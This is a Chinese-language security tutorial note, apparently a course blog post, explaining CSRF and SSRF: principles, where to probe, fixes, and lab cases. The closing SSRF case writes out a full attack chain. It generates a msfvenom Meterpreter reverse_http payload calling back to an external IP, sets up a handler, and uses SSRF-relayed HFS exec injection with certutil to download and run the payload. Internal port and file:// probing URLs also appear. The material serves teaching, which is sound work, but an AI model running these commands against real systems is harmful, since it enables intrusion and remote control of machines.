#知识点:
1、CSRF-原理&危害&探针&利用等
2、SSRF-原理&危害&探针&利用等
3、CSRF&SSRF-黑盒下漏洞探针点
本节课主要对CSRF和SSRF的知识进行讲解,由于知识点过于混杂先看知识导图在进行细节方面的讲解。
CSRF:
#详细点:
CSRF全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One Click Attack” 或 “Session Riding”,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但自己的qq号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义伪造请求,执行恶意操作,具有很大的危害性。
CSRF的攻击过程两个条件:
1、目标用户已经登录了网站,能够执行网站的功能。
2、目标用户访问了攻击者构造的URL。
CSRF安全问题黑盒怎么判断:
1、看验证来源不-修复
2、看凭据有无token--修复
3、看关键操作有无验证-修复
-CSRF安全问题白盒怎么审计:
同黑盒思路一样,代码中分析上述三看
CSRF案例:
#CSRF-原理&后台自动添加管理员
-案例说明:小迪在登录后台管理自己网站的时候,突然群里给小迪说阿祖又说爱上别人了,随后给我发了个URL链接,小迪直接点了进去,GG(小迪网站管理员多了一个人)!
小迪的网站:http://test.xiaodi8.com/
发送的URL:http://47.94.236.117/add.html
利用流程:
1、获取目标的触发数据包
2、利用CSRFTester构造导出
3、诱使受害者访问特定地址触发
上面的那个add.html就是增加管理员命令的那个数据包,至于这个URL的构造我们可以利用CSRFTester这个工具来构造,具体的流程就是首先通过前期的信息收集得知这个网站是由什么系统搭建的,那么我们就可以在本地搭建个一样的,然后打开这个工具,首先点击start,并且浏览器也要设置代理为本地的8008端口,然后在浏览器执行添加管理员的操作,抓到包之后就用from形式,然后点击右下角保存就是我们需要的地址,然后还要对这个数据包进行修改,只保留那个request2的,其他的全部删掉。
CSRF攻击需要满足三个条件:网站在管理员登录状态(或则不是网站的话其他的也得是登陆状态),然后能构造数据包,并且构造的地址对方会点击。三个条件缺一不可。
通俗的解释CSRF:
“攻击者盗用了你的身份,以你的名义发送恶意请求”,CSRF是一种依赖web浏览器的、被混淆过的代理人攻击,往往涉及到个人隐私泄露以及财产安全。
csrf黑盒首先看有无token,第二点看能够触发的数据包的地址是不是管理员直接访问就可以直接触发成功,有没有验证过程,有的话能不能绕过,不能绕过就gg,第三个看同源策略,这个可以通过抓包去修改refer的值.
SSRF:
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
-SSRF黑盒可能出现的地方:
1.社交分享功能:获取超链接的标题等内容进行显示
2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线翻译:给网址翻译对应网页的内容
4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片
5.图片/文章收藏功能:主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验
6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试
7.网站采集,网站抓取的地方:一些网站会针对你输入的url进行一些信息采集工作
8.数据库内置功能:数据库的比如mongodb的copyDatabase函数
9.邮件系统:比如接收邮件服务器地址
10.编码处理, 属性信息处理,文件处理:比如ffpmg,ImageMagick,docx,pdf,xml处理器等
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法加上这些关键字去寻找SSRF漏洞
一些的url中的关键字:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……
12.从远程服务器请求资源(upload from url 如discuz!;import & expost rss feed 如web blog;使用了xml引擎对象的地方 如wordpress xmlrpc.php)
-SSRF白盒可能出现的地方:
1、功能点抓包指向代码块审计
2、功能点函数定位代码块审计
-SSRF常见安全修复防御方案:
1、禁用跳转
2、禁用不需要的协议
3、固定或限制资源地址
4、错误信息统一信息处理
当我们不能直接访问到内网时,如果服务器存在ssrf漏洞的话,我们就可以利用服务器去请求解析我们输入的url。相当于时把服务器当作了跳板去访问内网信息,并且ssrf还可以用于网络探针,比如不知道内网地址以及开放的端口,可以直接用burp抓包然后用intruder这个功能直接爆破看返回的数据包信息来判断内网存活的ip以及相应的端口。还有就是协议的相关玩法,比如可以利用file协议去读取文件,http协议去进行网络探针。
攻击者是访问的服务器,然后发送的地址,服务器会解析它然后自身去请求这个解析的地址。总的来说是服务器去请求内网,而不是攻击者去请求内网。就是当你直接访问内网的时候访问不了,解决了网络通讯问题。
但是这个ssrf产生的条件也是很苛刻的,比如我们首先去探针内网存货的ip地址,你有可能探针不到,探针到了存活的ip地址以及端口之后,这个服务器也要存在ssrf漏洞,并且它存在ssrf漏洞的话,我们利用服务器去上传的木马也有可能会被防火墙以及一些权限导致执行不了。但是如果条件都满足的话,也是一个高危漏洞。
这里我们利用qq空间去访问一个地址,如果后面我们访问的是127.0.0.1的话,那就是服务器访问的自己的资源了。如果你构造的是127.0.0.1这个地址的话,那就是服务器访问自己本地的资源然后返回给你,如果是内网地址的话,那么服务器就会请求自己内网对应的资源返回给你。而ssrf的精髓就是这个请求是服务器去请求的不是你自己请求的。
这里我们进行一个案例(我感觉没啥用的案例)
这个是hualala的一个商户中心的页面,可以看到是我们输入参数服务器去访问的。
单独访问前面的地址的话就是下图:
当我们把URL后面的参数改成127.0.0.1时会发现他会跳到这个页面,那么我们就可以在后面加上不同的端口去进行网络探针。(但是我在后面加上不同端口去访问,页面没有啥变化,所以我觉得这个很鸡肋,没啥用。)
#SSRF-原理&服务&协议&内网&漏洞
-参考文章:https://www.t00ls.cc/articles-41070.html
-案例说明:小迪在本地创建了远程图片文件加载应用,直接被攻击者利用SSRF探针本地及内网服务,并利用某漏洞直接获取到内网某主机的权限!
1、服务探针:
http://127.0.0.1:8081/
http://127.0.0.1:3306/
2、协议玩法:(更多玩法见上图)
file:///D:/www.txt
dict://127.0.0.1:3306/info
ftp://192.168.46.148:21
3、内网扫描:
http://192.168.46.148:8080
4、漏洞利用:
-生成:msfvenom -p windows/meterpreter/reverse_http LHOST=47.94.236.117 LPORT=6688 -f exe -o xx.exe
-监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 6688
run
-下载:http://192.168.46.148:8080/?search==%00{.exec|cmd.exe%20/c%20certutil%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.}
-执行:http://192.168.46.148:8080/?search==%00{.exec|xx.exe.}
512
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
